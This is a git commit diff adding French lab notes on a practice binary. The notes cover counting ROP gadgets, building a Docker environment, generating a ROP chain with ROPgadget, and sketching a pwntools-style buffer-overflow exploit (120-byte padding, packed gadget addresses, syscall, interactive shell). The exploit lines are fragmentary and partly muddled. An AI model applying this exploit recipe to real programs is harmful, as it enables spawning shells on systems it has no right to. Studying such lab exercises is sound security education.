parent
4cbcd36c74
commit
e6cf606ab4
@ -1,2 +1,21 @@
|
|||||||
Combien de gadgets possède le binaire nommé "binaire" dans le dossier Bufferoverflow ?
|
Combien de gadgets possède le binaire nommé "binaire" dans le dossier Bufferoverflow ?
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
docker build . -t secu
|
||||||
|
|
||||||
|
docker run --rm -it secu
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
python3 ROPgadget/ROPgadget.py --binary Bufferoverflow/binaire --ropchain
|
||||||
|
|
||||||
|
dans un fichier python :
|
||||||
|
p = b'A' * 120 => buffer overflow
|
||||||
|
p += pack('<Q', 0x0000000000495f90) # add rax, 1 ; ret => p += p64(0x0000000000401fa4) # syscall : on convertit en p64 car la convertion est nul
|
||||||
|
|
||||||
|
r.process("./binaire") => on execute le binaire
|
||||||
|
r.sendline(p) => on met dans le buffer toutes les adresses et l'attaque Bufferoverflow
|
||||||
|
r.interactive() => on met a disposition le shell interactif sur le terminal
|
||||||
|
|
||||||
|
|
Loading…
Reference in new issue